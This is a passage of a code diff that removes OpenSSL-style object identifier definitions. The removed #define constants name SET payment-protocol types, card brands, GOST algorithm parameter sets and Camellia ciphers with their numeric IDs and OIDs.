-#define SN_setct_BatchAdminResData		"setct-BatchAdminResData"
-#define NID_setct_BatchAdminResData		559
-#define OBJ_setct_BatchAdminResData		OBJ_set_ctype,41L
-
-#define SN_setct_CardCInitResTBS		"setct-CardCInitResTBS"
-#define NID_setct_CardCInitResTBS		560
-#define OBJ_setct_CardCInitResTBS		OBJ_set_ctype,42L
-
-#define SN_setct_MeAqCInitResTBS		"setct-MeAqCInitResTBS"
-#define NID_setct_MeAqCInitResTBS		561
-#define OBJ_setct_MeAqCInitResTBS		OBJ_set_ctype,43L
-
-#define SN_setct_RegFormResTBS		"setct-RegFormResTBS"
-#define NID_setct_RegFormResTBS		562
-#define OBJ_setct_RegFormResTBS		OBJ_set_ctype,44L
-
-#define SN_setct_CertReqData		"setct-CertReqData"
-#define NID_setct_CertReqData		563
-#define OBJ_setct_CertReqData		OBJ_set_ctype,45L
-
-#define SN_setct_CertReqTBS		"setct-CertReqTBS"
-#define NID_setct_CertReqTBS		564
-#define OBJ_setct_CertReqTBS		OBJ_set_ctype,46L
-
-#define SN_setct_CertResData		"setct-CertResData"
-#define NID_setct_CertResData		565
-#define OBJ_setct_CertResData		OBJ_set_ctype,47L
-
-#define SN_setct_CertInqReqTBS		"setct-CertInqReqTBS"
-#define NID_setct_CertInqReqTBS		566
-#define OBJ_setct_CertInqReqTBS		OBJ_set_ctype,48L
-
-#define SN_setct_ErrorTBS		"setct-ErrorTBS"
-#define NID_setct_ErrorTBS		567
-#define OBJ_setct_ErrorTBS		OBJ_set_ctype,49L
-
-#define SN_setct_PIDualSignedTBE		"setct-PIDualSignedTBE"
-#define NID_setct_PIDualSignedTBE		568
-#define OBJ_setct_PIDualSignedTBE		OBJ_set_ctype,50L
-
-#define SN_setct_PIUnsignedTBE		"setct-PIUnsignedTBE"
-#define NID_setct_PIUnsignedTBE		569
-#define OBJ_setct_PIUnsignedTBE		OBJ_set_ctype,51L
-
-#define SN_setct_AuthReqTBE		"setct-AuthReqTBE"
-#define NID_setct_AuthReqTBE		570
-#define OBJ_setct_AuthReqTBE		OBJ_set_ctype,52L
-
-#define SN_setct_AuthResTBE		"setct-AuthResTBE"
-#define NID_setct_AuthResTBE		571
-#define OBJ_setct_AuthResTBE		OBJ_set_ctype,53L
-
-#define SN_setct_AuthResTBEX		"setct-AuthResTBEX"
-#define NID_setct_AuthResTBEX		572
-#define OBJ_setct_AuthResTBEX		OBJ_set_ctype,54L
-
-#define SN_setct_AuthTokenTBE		"setct-AuthTokenTBE"
-#define NID_setct_AuthTokenTBE		573
-#define OBJ_setct_AuthTokenTBE		OBJ_set_ctype,55L
-
-#define SN_setct_CapTokenTBE		"setct-CapTokenTBE"
-#define NID_setct_CapTokenTBE		574
-#define OBJ_setct_CapTokenTBE		OBJ_set_ctype,56L
-
-#define SN_setct_CapTokenTBEX		"setct-CapTokenTBEX"
-#define NID_setct_CapTokenTBEX		575
-#define OBJ_setct_CapTokenTBEX		OBJ_set_ctype,57L
-
-#define SN_setct_AcqCardCodeMsgTBE		"setct-AcqCardCodeMsgTBE"
-#define NID_setct_AcqCardCodeMsgTBE		576
-#define OBJ_setct_AcqCardCodeMsgTBE		OBJ_set_ctype,58L
-
-#define SN_setct_AuthRevReqTBE		"setct-AuthRevReqTBE"
-#define NID_setct_AuthRevReqTBE		577
-#define OBJ_setct_AuthRevReqTBE		OBJ_set_ctype,59L
-
-#define SN_setct_AuthRevResTBE		"setct-AuthRevResTBE"
-#define NID_setct_AuthRevResTBE		578
-#define OBJ_setct_AuthRevResTBE		OBJ_set_ctype,60L
-
-#define SN_setct_AuthRevResTBEB		"setct-AuthRevResTBEB"
-#define NID_setct_AuthRevResTBEB		579
-#define OBJ_setct_AuthRevResTBEB		OBJ_set_ctype,61L
-
-#define SN_setct_CapReqTBE		"setct-CapReqTBE"
-#define NID_setct_CapReqTBE		580
-#define OBJ_setct_CapReqTBE		OBJ_set_ctype,62L
-
-#define SN_setct_CapReqTBEX		"setct-CapReqTBEX"
-#define NID_setct_CapReqTBEX		581
-#define OBJ_setct_CapReqTBEX		OBJ_set_ctype,63L
-
-#define SN_setct_CapResTBE		"setct-CapResTBE"
-#define NID_setct_CapResTBE		582
-#define OBJ_setct_CapResTBE		OBJ_set_ctype,64L
-
-#define SN_setct_CapRevReqTBE		"setct-CapRevReqTBE"
-#define NID_setct_CapRevReqTBE		583
-#define OBJ_setct_CapRevReqTBE		OBJ_set_ctype,65L
-
-#define SN_setct_CapRevReqTBEX		"setct-CapRevReqTBEX"
-#define NID_setct_CapRevReqTBEX		584
-#define OBJ_setct_CapRevReqTBEX		OBJ_set_ctype,66L
-
-#define SN_setct_CapRevResTBE		"setct-CapRevResTBE"
-#define NID_setct_CapRevResTBE		585
-#define OBJ_setct_CapRevResTBE		OBJ_set_ctype,67L
-
-#define SN_setct_CredReqTBE		"setct-CredReqTBE"
-#define NID_setct_CredReqTBE		586
-#define OBJ_setct_CredReqTBE		OBJ_set_ctype,68L
-
-#define SN_setct_CredReqTBEX		"setct-CredReqTBEX"
-#define NID_setct_CredReqTBEX		587
-#define OBJ_setct_CredReqTBEX		OBJ_set_ctype,69L
-
-#define SN_setct_CredResTBE		"setct-CredResTBE"
-#define NID_setct_CredResTBE		588
-#define OBJ_setct_CredResTBE		OBJ_set_ctype,70L
-
-#define SN_setct_CredRevReqTBE		"setct-CredRevReqTBE"
-#define NID_setct_CredRevReqTBE		589
-#define OBJ_setct_CredRevReqTBE		OBJ_set_ctype,71L
-
-#define SN_setct_CredRevReqTBEX		"setct-CredRevReqTBEX"
-#define NID_setct_CredRevReqTBEX		590
-#define OBJ_setct_CredRevReqTBEX		OBJ_set_ctype,72L
-
-#define SN_setct_CredRevResTBE		"setct-CredRevResTBE"
-#define NID_setct_CredRevResTBE		591
-#define OBJ_setct_CredRevResTBE		OBJ_set_ctype,73L
-
-#define SN_setct_BatchAdminReqTBE		"setct-BatchAdminReqTBE"
-#define NID_setct_BatchAdminReqTBE		592
-#define OBJ_setct_BatchAdminReqTBE		OBJ_set_ctype,74L
-
-#define SN_setct_BatchAdminResTBE		"setct-BatchAdminResTBE"
-#define NID_setct_BatchAdminResTBE		593
-#define OBJ_setct_BatchAdminResTBE		OBJ_set_ctype,75L
-
-#define SN_setct_RegFormReqTBE		"setct-RegFormReqTBE"
-#define NID_setct_RegFormReqTBE		594
-#define OBJ_setct_RegFormReqTBE		OBJ_set_ctype,76L
-
-#define SN_setct_CertReqTBE		"setct-CertReqTBE"
-#define NID_setct_CertReqTBE		595
-#define OBJ_setct_CertReqTBE		OBJ_set_ctype,77L
-
-#define SN_setct_CertReqTBEX		"setct-CertReqTBEX"
-#define NID_setct_CertReqTBEX		596
-#define OBJ_setct_CertReqTBEX		OBJ_set_ctype,78L
-
-#define SN_setct_CertResTBE		"setct-CertResTBE"
-#define NID_setct_CertResTBE		597
-#define OBJ_setct_CertResTBE		OBJ_set_ctype,79L
-
-#define SN_setct_CRLNotificationTBS		"setct-CRLNotificationTBS"
-#define NID_setct_CRLNotificationTBS		598
-#define OBJ_setct_CRLNotificationTBS		OBJ_set_ctype,80L
-
-#define SN_setct_CRLNotificationResTBS		"setct-CRLNotificationResTBS"
-#define NID_setct_CRLNotificationResTBS		599
-#define OBJ_setct_CRLNotificationResTBS		OBJ_set_ctype,81L
-
-#define SN_setct_BCIDistributionTBS		"setct-BCIDistributionTBS"
-#define NID_setct_BCIDistributionTBS		600
-#define OBJ_setct_BCIDistributionTBS		OBJ_set_ctype,82L
-
-#define SN_setext_genCrypt		"setext-genCrypt"
-#define LN_setext_genCrypt		"generic cryptogram"
-#define NID_setext_genCrypt		601
-#define OBJ_setext_genCrypt		OBJ_set_msgExt,1L
-
-#define SN_setext_miAuth		"setext-miAuth"
-#define LN_setext_miAuth		"merchant initiated auth"
-#define NID_setext_miAuth		602
-#define OBJ_setext_miAuth		OBJ_set_msgExt,3L
-
-#define SN_setext_pinSecure		"setext-pinSecure"
-#define NID_setext_pinSecure		603
-#define OBJ_setext_pinSecure		OBJ_set_msgExt,4L
-
-#define SN_setext_pinAny		"setext-pinAny"
-#define NID_setext_pinAny		604
-#define OBJ_setext_pinAny		OBJ_set_msgExt,5L
-
-#define SN_setext_track2		"setext-track2"
-#define NID_setext_track2		605
-#define OBJ_setext_track2		OBJ_set_msgExt,7L
-
-#define SN_setext_cv		"setext-cv"
-#define LN_setext_cv		"additional verification"
-#define NID_setext_cv		606
-#define OBJ_setext_cv		OBJ_set_msgExt,8L
-
-#define SN_set_policy_root		"set-policy-root"
-#define NID_set_policy_root		607
-#define OBJ_set_policy_root		OBJ_set_policy,0L
-
-#define SN_setCext_hashedRoot		"setCext-hashedRoot"
-#define NID_setCext_hashedRoot		608
-#define OBJ_setCext_hashedRoot		OBJ_set_certExt,0L
-
-#define SN_setCext_certType		"setCext-certType"
-#define NID_setCext_certType		609
-#define OBJ_setCext_certType		OBJ_set_certExt,1L
-
-#define SN_setCext_merchData		"setCext-merchData"
-#define NID_setCext_merchData		610
-#define OBJ_setCext_merchData		OBJ_set_certExt,2L
-
-#define SN_setCext_cCertRequired		"setCext-cCertRequired"
-#define NID_setCext_cCertRequired		611
-#define OBJ_setCext_cCertRequired		OBJ_set_certExt,3L
-
-#define SN_setCext_tunneling		"setCext-tunneling"
-#define NID_setCext_tunneling		612
-#define OBJ_setCext_tunneling		OBJ_set_certExt,4L
-
-#define SN_setCext_setExt		"setCext-setExt"
-#define NID_setCext_setExt		613
-#define OBJ_setCext_setExt		OBJ_set_certExt,5L
-
-#define SN_setCext_setQualf		"setCext-setQualf"
-#define NID_setCext_setQualf		614
-#define OBJ_setCext_setQualf		OBJ_set_certExt,6L
-
-#define SN_setCext_PGWYcapabilities		"setCext-PGWYcapabilities"
-#define NID_setCext_PGWYcapabilities		615
-#define OBJ_setCext_PGWYcapabilities		OBJ_set_certExt,7L
-
-#define SN_setCext_TokenIdentifier		"setCext-TokenIdentifier"
-#define NID_setCext_TokenIdentifier		616
-#define OBJ_setCext_TokenIdentifier		OBJ_set_certExt,8L
-
-#define SN_setCext_Track2Data		"setCext-Track2Data"
-#define NID_setCext_Track2Data		617
-#define OBJ_setCext_Track2Data		OBJ_set_certExt,9L
-
-#define SN_setCext_TokenType		"setCext-TokenType"
-#define NID_setCext_TokenType		618
-#define OBJ_setCext_TokenType		OBJ_set_certExt,10L
-
-#define SN_setCext_IssuerCapabilities		"setCext-IssuerCapabilities"
-#define NID_setCext_IssuerCapabilities		619
-#define OBJ_setCext_IssuerCapabilities		OBJ_set_certExt,11L
-
-#define SN_setAttr_Cert		"setAttr-Cert"
-#define NID_setAttr_Cert		620
-#define OBJ_setAttr_Cert		OBJ_set_attr,0L
-
-#define SN_setAttr_PGWYcap		"setAttr-PGWYcap"
-#define LN_setAttr_PGWYcap		"payment gateway capabilities"
-#define NID_setAttr_PGWYcap		621
-#define OBJ_setAttr_PGWYcap		OBJ_set_attr,1L
-
-#define SN_setAttr_TokenType		"setAttr-TokenType"
-#define NID_setAttr_TokenType		622
-#define OBJ_setAttr_TokenType		OBJ_set_attr,2L
-
-#define SN_setAttr_IssCap		"setAttr-IssCap"
-#define LN_setAttr_IssCap		"issuer capabilities"
-#define NID_setAttr_IssCap		623
-#define OBJ_setAttr_IssCap		OBJ_set_attr,3L
-
-#define SN_set_rootKeyThumb		"set-rootKeyThumb"
-#define NID_set_rootKeyThumb		624
-#define OBJ_set_rootKeyThumb		OBJ_setAttr_Cert,0L
-
-#define SN_set_addPolicy		"set-addPolicy"
-#define NID_set_addPolicy		625
-#define OBJ_set_addPolicy		OBJ_setAttr_Cert,1L
-
-#define SN_setAttr_Token_EMV		"setAttr-Token-EMV"
-#define NID_setAttr_Token_EMV		626
-#define OBJ_setAttr_Token_EMV		OBJ_setAttr_TokenType,1L
-
-#define SN_setAttr_Token_B0Prime		"setAttr-Token-B0Prime"
-#define NID_setAttr_Token_B0Prime		627
-#define OBJ_setAttr_Token_B0Prime		OBJ_setAttr_TokenType,2L
-
-#define SN_setAttr_IssCap_CVM		"setAttr-IssCap-CVM"
-#define NID_setAttr_IssCap_CVM		628
-#define OBJ_setAttr_IssCap_CVM		OBJ_setAttr_IssCap,3L
-
-#define SN_setAttr_IssCap_T2		"setAttr-IssCap-T2"
-#define NID_setAttr_IssCap_T2		629
-#define OBJ_setAttr_IssCap_T2		OBJ_setAttr_IssCap,4L
-
-#define SN_setAttr_IssCap_Sig		"setAttr-IssCap-Sig"
-#define NID_setAttr_IssCap_Sig		630
-#define OBJ_setAttr_IssCap_Sig		OBJ_setAttr_IssCap,5L
-
-#define SN_setAttr_GenCryptgrm		"setAttr-GenCryptgrm"
-#define LN_setAttr_GenCryptgrm		"generate cryptogram"
-#define NID_setAttr_GenCryptgrm		631
-#define OBJ_setAttr_GenCryptgrm		OBJ_setAttr_IssCap_CVM,1L
-
-#define SN_setAttr_T2Enc		"setAttr-T2Enc"
-#define LN_setAttr_T2Enc		"encrypted track 2"
-#define NID_setAttr_T2Enc		632
-#define OBJ_setAttr_T2Enc		OBJ_setAttr_IssCap_T2,1L
-
-#define SN_setAttr_T2cleartxt		"setAttr-T2cleartxt"
-#define LN_setAttr_T2cleartxt		"cleartext track 2"
-#define NID_setAttr_T2cleartxt		633
-#define OBJ_setAttr_T2cleartxt		OBJ_setAttr_IssCap_T2,2L
-
-#define SN_setAttr_TokICCsig		"setAttr-TokICCsig"
-#define LN_setAttr_TokICCsig		"ICC or token signature"
-#define NID_setAttr_TokICCsig		634
-#define OBJ_setAttr_TokICCsig		OBJ_setAttr_IssCap_Sig,1L
-
-#define SN_setAttr_SecDevSig		"setAttr-SecDevSig"
-#define LN_setAttr_SecDevSig		"secure device signature"
-#define NID_setAttr_SecDevSig		635
-#define OBJ_setAttr_SecDevSig		OBJ_setAttr_IssCap_Sig,2L
-
-#define SN_set_brand_IATA_ATA		"set-brand-IATA-ATA"
-#define NID_set_brand_IATA_ATA		636
-#define OBJ_set_brand_IATA_ATA		OBJ_set_brand,1L
-
-#define SN_set_brand_Diners		"set-brand-Diners"
-#define NID_set_brand_Diners		637
-#define OBJ_set_brand_Diners		OBJ_set_brand,30L
-
-#define SN_set_brand_AmericanExpress		"set-brand-AmericanExpress"
-#define NID_set_brand_AmericanExpress		638
-#define OBJ_set_brand_AmericanExpress		OBJ_set_brand,34L
-
-#define SN_set_brand_JCB		"set-brand-JCB"
-#define NID_set_brand_JCB		639
-#define OBJ_set_brand_JCB		OBJ_set_brand,35L
-
-#define SN_set_brand_Visa		"set-brand-Visa"
-#define NID_set_brand_Visa		640
-#define OBJ_set_brand_Visa		OBJ_set_brand,4L
-
-#define SN_set_brand_MasterCard		"set-brand-MasterCard"
-#define NID_set_brand_MasterCard		641
-#define OBJ_set_brand_MasterCard		OBJ_set_brand,5L
-
-#define SN_set_brand_Novus		"set-brand-Novus"
-#define NID_set_brand_Novus		642
-#define OBJ_set_brand_Novus		OBJ_set_brand,6011L
-
-#define SN_des_cdmf		"DES-CDMF"
-#define LN_des_cdmf		"des-cdmf"
-#define NID_des_cdmf		643
-#define OBJ_des_cdmf		OBJ_rsadsi,3L,10L
-
-#define SN_rsaOAEPEncryptionSET		"rsaOAEPEncryptionSET"
-#define NID_rsaOAEPEncryptionSET		644
-#define OBJ_rsaOAEPEncryptionSET		OBJ_rsadsi,1L,1L,6L
-
-#define SN_ipsec3		"Oakley-EC2N-3"
-#define LN_ipsec3		"ipsec3"
-#define NID_ipsec3		749
-
-#define SN_ipsec4		"Oakley-EC2N-4"
-#define LN_ipsec4		"ipsec4"
-#define NID_ipsec4		750
-
-#define SN_whirlpool		"whirlpool"
-#define NID_whirlpool		804
-#define OBJ_whirlpool		OBJ_iso,0L,10118L,3L,0L,55L
-
-#define SN_cryptopro		"cryptopro"
-#define NID_cryptopro		805
-#define OBJ_cryptopro		OBJ_member_body,643L,2L,2L
-
-#define SN_cryptocom		"cryptocom"
-#define NID_cryptocom		806
-#define OBJ_cryptocom		OBJ_member_body,643L,2L,9L
-
-#define SN_id_GostR3411_94_with_GostR3410_2001		"id-GostR3411-94-with-GostR3410-2001"
-#define LN_id_GostR3411_94_with_GostR3410_2001		"GOST R 34.11-94 with GOST R 34.10-2001"
-#define NID_id_GostR3411_94_with_GostR3410_2001		807
-#define OBJ_id_GostR3411_94_with_GostR3410_2001		OBJ_cryptopro,3L
-
-#define SN_id_GostR3411_94_with_GostR3410_94		"id-GostR3411-94-with-GostR3410-94"
-#define LN_id_GostR3411_94_with_GostR3410_94		"GOST R 34.11-94 with GOST R 34.10-94"
-#define NID_id_GostR3411_94_with_GostR3410_94		808
-#define OBJ_id_GostR3411_94_with_GostR3410_94		OBJ_cryptopro,4L
-
-#define SN_id_GostR3411_94		"md_gost94"
-#define LN_id_GostR3411_94		"GOST R 34.11-94"
-#define NID_id_GostR3411_94		809
-#define OBJ_id_GostR3411_94		OBJ_cryptopro,9L
-
-#define SN_id_HMACGostR3411_94		"id-HMACGostR3411-94"
-#define LN_id_HMACGostR3411_94		"HMAC GOST 34.11-94"
-#define NID_id_HMACGostR3411_94		810
-#define OBJ_id_HMACGostR3411_94		OBJ_cryptopro,10L
-
-#define SN_id_GostR3410_2001		"gost2001"
-#define LN_id_GostR3410_2001		"GOST R 34.10-2001"
-#define NID_id_GostR3410_2001		811
-#define OBJ_id_GostR3410_2001		OBJ_cryptopro,19L
-
-#define SN_id_GostR3410_94		"gost94"
-#define LN_id_GostR3410_94		"GOST R 34.10-94"
-#define NID_id_GostR3410_94		812
-#define OBJ_id_GostR3410_94		OBJ_cryptopro,20L
-
-#define SN_id_Gost28147_89		"gost89"
-#define LN_id_Gost28147_89		"GOST 28147-89"
-#define NID_id_Gost28147_89		813
-#define OBJ_id_Gost28147_89		OBJ_cryptopro,21L
-
-#define SN_gost89_cnt		"gost89-cnt"
-#define NID_gost89_cnt		814
-
-#define SN_id_Gost28147_89_MAC		"gost-mac"
-#define LN_id_Gost28147_89_MAC		"GOST 28147-89 MAC"
-#define NID_id_Gost28147_89_MAC		815
-#define OBJ_id_Gost28147_89_MAC		OBJ_cryptopro,22L
-
-#define SN_id_GostR3411_94_prf		"prf-gostr3411-94"
-#define LN_id_GostR3411_94_prf		"GOST R 34.11-94 PRF"
-#define NID_id_GostR3411_94_prf		816
-#define OBJ_id_GostR3411_94_prf		OBJ_cryptopro,23L
-
-#define SN_id_GostR3410_2001DH		"id-GostR3410-2001DH"
-#define LN_id_GostR3410_2001DH		"GOST R 34.10-2001 DH"
-#define NID_id_GostR3410_2001DH		817
-#define OBJ_id_GostR3410_2001DH		OBJ_cryptopro,98L
-
-#define SN_id_GostR3410_94DH		"id-GostR3410-94DH"
-#define LN_id_GostR3410_94DH		"GOST R 34.10-94 DH"
-#define NID_id_GostR3410_94DH		818
-#define OBJ_id_GostR3410_94DH		OBJ_cryptopro,99L
-
-#define SN_id_Gost28147_89_CryptoPro_KeyMeshing		"id-Gost28147-89-CryptoPro-KeyMeshing"
-#define NID_id_Gost28147_89_CryptoPro_KeyMeshing		819
-#define OBJ_id_Gost28147_89_CryptoPro_KeyMeshing		OBJ_cryptopro,14L,1L
-
-#define SN_id_Gost28147_89_None_KeyMeshing		"id-Gost28147-89-None-KeyMeshing"
-#define NID_id_Gost28147_89_None_KeyMeshing		820
-#define OBJ_id_Gost28147_89_None_KeyMeshing		OBJ_cryptopro,14L,0L
-
-#define SN_id_GostR3411_94_TestParamSet		"id-GostR3411-94-TestParamSet"
-#define NID_id_GostR3411_94_TestParamSet		821
-#define OBJ_id_GostR3411_94_TestParamSet		OBJ_cryptopro,30L,0L
-
-#define SN_id_GostR3411_94_CryptoProParamSet		"id-GostR3411-94-CryptoProParamSet"
-#define NID_id_GostR3411_94_CryptoProParamSet		822
-#define OBJ_id_GostR3411_94_CryptoProParamSet		OBJ_cryptopro,30L,1L
-
-#define SN_id_Gost28147_89_TestParamSet		"id-Gost28147-89-TestParamSet"
-#define NID_id_Gost28147_89_TestParamSet		823
-#define OBJ_id_Gost28147_89_TestParamSet		OBJ_cryptopro,31L,0L
-
-#define SN_id_Gost28147_89_CryptoPro_A_ParamSet		"id-Gost28147-89-CryptoPro-A-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_A_ParamSet		824
-#define OBJ_id_Gost28147_89_CryptoPro_A_ParamSet		OBJ_cryptopro,31L,1L
-
-#define SN_id_Gost28147_89_CryptoPro_B_ParamSet		"id-Gost28147-89-CryptoPro-B-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_B_ParamSet		825
-#define OBJ_id_Gost28147_89_CryptoPro_B_ParamSet		OBJ_cryptopro,31L,2L
-
-#define SN_id_Gost28147_89_CryptoPro_C_ParamSet		"id-Gost28147-89-CryptoPro-C-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_C_ParamSet		826
-#define OBJ_id_Gost28147_89_CryptoPro_C_ParamSet		OBJ_cryptopro,31L,3L
-
-#define SN_id_Gost28147_89_CryptoPro_D_ParamSet		"id-Gost28147-89-CryptoPro-D-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_D_ParamSet		827
-#define OBJ_id_Gost28147_89_CryptoPro_D_ParamSet		OBJ_cryptopro,31L,4L
-
-#define SN_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		"id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		828
-#define OBJ_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		OBJ_cryptopro,31L,5L
-
-#define SN_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		"id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		829
-#define OBJ_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		OBJ_cryptopro,31L,6L
-
-#define SN_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		"id-Gost28147-89-CryptoPro-RIC-1-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		830
-#define OBJ_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		OBJ_cryptopro,31L,7L
-
-#define SN_id_GostR3410_94_TestParamSet		"id-GostR3410-94-TestParamSet"
-#define NID_id_GostR3410_94_TestParamSet		831
-#define OBJ_id_GostR3410_94_TestParamSet		OBJ_cryptopro,32L,0L
-
-#define SN_id_GostR3410_94_CryptoPro_A_ParamSet		"id-GostR3410-94-CryptoPro-A-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_A_ParamSet		832
-#define OBJ_id_GostR3410_94_CryptoPro_A_ParamSet		OBJ_cryptopro,32L,2L
-
-#define SN_id_GostR3410_94_CryptoPro_B_ParamSet		"id-GostR3410-94-CryptoPro-B-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_B_ParamSet		833
-#define OBJ_id_GostR3410_94_CryptoPro_B_ParamSet		OBJ_cryptopro,32L,3L
-
-#define SN_id_GostR3410_94_CryptoPro_C_ParamSet		"id-GostR3410-94-CryptoPro-C-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_C_ParamSet		834
-#define OBJ_id_GostR3410_94_CryptoPro_C_ParamSet		OBJ_cryptopro,32L,4L
-
-#define SN_id_GostR3410_94_CryptoPro_D_ParamSet		"id-GostR3410-94-CryptoPro-D-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_D_ParamSet		835
-#define OBJ_id_GostR3410_94_CryptoPro_D_ParamSet		OBJ_cryptopro,32L,5L
-
-#define SN_id_GostR3410_94_CryptoPro_XchA_ParamSet		"id-GostR3410-94-CryptoPro-XchA-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_XchA_ParamSet		836
-#define OBJ_id_GostR3410_94_CryptoPro_XchA_ParamSet		OBJ_cryptopro,33L,1L
-
-#define SN_id_GostR3410_94_CryptoPro_XchB_ParamSet		"id-GostR3410-94-CryptoPro-XchB-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_XchB_ParamSet		837
-#define OBJ_id_GostR3410_94_CryptoPro_XchB_ParamSet		OBJ_cryptopro,33L,2L
-
-#define SN_id_GostR3410_94_CryptoPro_XchC_ParamSet		"id-GostR3410-94-CryptoPro-XchC-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_XchC_ParamSet		838
-#define OBJ_id_GostR3410_94_CryptoPro_XchC_ParamSet		OBJ_cryptopro,33L,3L
-
-#define SN_id_GostR3410_2001_TestParamSet		"id-GostR3410-2001-TestParamSet"
-#define NID_id_GostR3410_2001_TestParamSet		839
-#define OBJ_id_GostR3410_2001_TestParamSet		OBJ_cryptopro,35L,0L
-
-#define SN_id_GostR3410_2001_CryptoPro_A_ParamSet		"id-GostR3410-2001-CryptoPro-A-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_A_ParamSet		840
-#define OBJ_id_GostR3410_2001_CryptoPro_A_ParamSet		OBJ_cryptopro,35L,1L
-
-#define SN_id_GostR3410_2001_CryptoPro_B_ParamSet		"id-GostR3410-2001-CryptoPro-B-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_B_ParamSet		841
-#define OBJ_id_GostR3410_2001_CryptoPro_B_ParamSet		OBJ_cryptopro,35L,2L
-
-#define SN_id_GostR3410_2001_CryptoPro_C_ParamSet		"id-GostR3410-2001-CryptoPro-C-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_C_ParamSet		842
-#define OBJ_id_GostR3410_2001_CryptoPro_C_ParamSet		OBJ_cryptopro,35L,3L
-
-#define SN_id_GostR3410_2001_CryptoPro_XchA_ParamSet		"id-GostR3410-2001-CryptoPro-XchA-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_XchA_ParamSet		843
-#define OBJ_id_GostR3410_2001_CryptoPro_XchA_ParamSet		OBJ_cryptopro,36L,0L
-
-#define SN_id_GostR3410_2001_CryptoPro_XchB_ParamSet		"id-GostR3410-2001-CryptoPro-XchB-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_XchB_ParamSet		844
-#define OBJ_id_GostR3410_2001_CryptoPro_XchB_ParamSet		OBJ_cryptopro,36L,1L
-
-#define SN_id_GostR3410_94_a		"id-GostR3410-94-a"
-#define NID_id_GostR3410_94_a		845
-#define OBJ_id_GostR3410_94_a		OBJ_id_GostR3410_94,1L
-
-#define SN_id_GostR3410_94_aBis		"id-GostR3410-94-aBis"
-#define NID_id_GostR3410_94_aBis		846
-#define OBJ_id_GostR3410_94_aBis		OBJ_id_GostR3410_94,2L
-
-#define SN_id_GostR3410_94_b		"id-GostR3410-94-b"
-#define NID_id_GostR3410_94_b		847
-#define OBJ_id_GostR3410_94_b		OBJ_id_GostR3410_94,3L
-
-#define SN_id_GostR3410_94_bBis		"id-GostR3410-94-bBis"
-#define NID_id_GostR3410_94_bBis		848
-#define OBJ_id_GostR3410_94_bBis		OBJ_id_GostR3410_94,4L
-
-#define SN_id_Gost28147_89_cc		"id-Gost28147-89-cc"
-#define LN_id_Gost28147_89_cc		"GOST 28147-89 Cryptocom ParamSet"
-#define NID_id_Gost28147_89_cc		849
-#define OBJ_id_Gost28147_89_cc		OBJ_cryptocom,1L,6L,1L
-
-#define SN_id_GostR3410_94_cc		"gost94cc"
-#define LN_id_GostR3410_94_cc		"GOST 34.10-94 Cryptocom"
-#define NID_id_GostR3410_94_cc		850
-#define OBJ_id_GostR3410_94_cc		OBJ_cryptocom,1L,5L,3L
-
-#define SN_id_GostR3410_2001_cc		"gost2001cc"
-#define LN_id_GostR3410_2001_cc		"GOST 34.10-2001 Cryptocom"
-#define NID_id_GostR3410_2001_cc		851
-#define OBJ_id_GostR3410_2001_cc		OBJ_cryptocom,1L,5L,4L
-
-#define SN_id_GostR3411_94_with_GostR3410_94_cc		"id-GostR3411-94-with-GostR3410-94-cc"
-#define LN_id_GostR3411_94_with_GostR3410_94_cc		"GOST R 34.11-94 with GOST R 34.10-94 Cryptocom"
-#define NID_id_GostR3411_94_with_GostR3410_94_cc		852
-#define OBJ_id_GostR3411_94_with_GostR3410_94_cc		OBJ_cryptocom,1L,3L,3L
-
-#define SN_id_GostR3411_94_with_GostR3410_2001_cc		"id-GostR3411-94-with-GostR3410-2001-cc"
-#define LN_id_GostR3411_94_with_GostR3410_2001_cc		"GOST R 34.11-94 with GOST R 34.10-2001 Cryptocom"
-#define NID_id_GostR3411_94_with_GostR3410_2001_cc		853
-#define OBJ_id_GostR3411_94_with_GostR3410_2001_cc		OBJ_cryptocom,1L,3L,4L
-
-#define SN_id_GostR3410_2001_ParamSet_cc		"id-GostR3410-2001-ParamSet-cc"
-#define LN_id_GostR3410_2001_ParamSet_cc		"GOST R 3410-2001 Parameter Set Cryptocom"
-#define NID_id_GostR3410_2001_ParamSet_cc		854
-#define OBJ_id_GostR3410_2001_ParamSet_cc		OBJ_cryptocom,1L,8L,1L
-
-#define SN_camellia_128_cbc		"CAMELLIA-128-CBC"
-#define LN_camellia_128_cbc		"camellia-128-cbc"
-#define NID_camellia_128_cbc		751
-#define OBJ_camellia_128_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,2L
-
-#define SN_camellia_192_cbc		"CAMELLIA-192-CBC"
-#define LN_camellia_192_cbc		"camellia-192-cbc"
-#define NID_camellia_192_cbc		752
-#define OBJ_camellia_192_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,3L
-
-#define SN_camellia_256_cbc		"CAMELLIA-256-CBC"
-#define LN_camellia_256_cbc		"camellia-256-cbc"
-#define NID_camellia_256_cbc		753
-#define OBJ_camellia_256_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,4L
-
-#define SN_id_camellia128_wrap		"id-camellia128-wrap"
-#define NID_id_camellia128_wrap		907
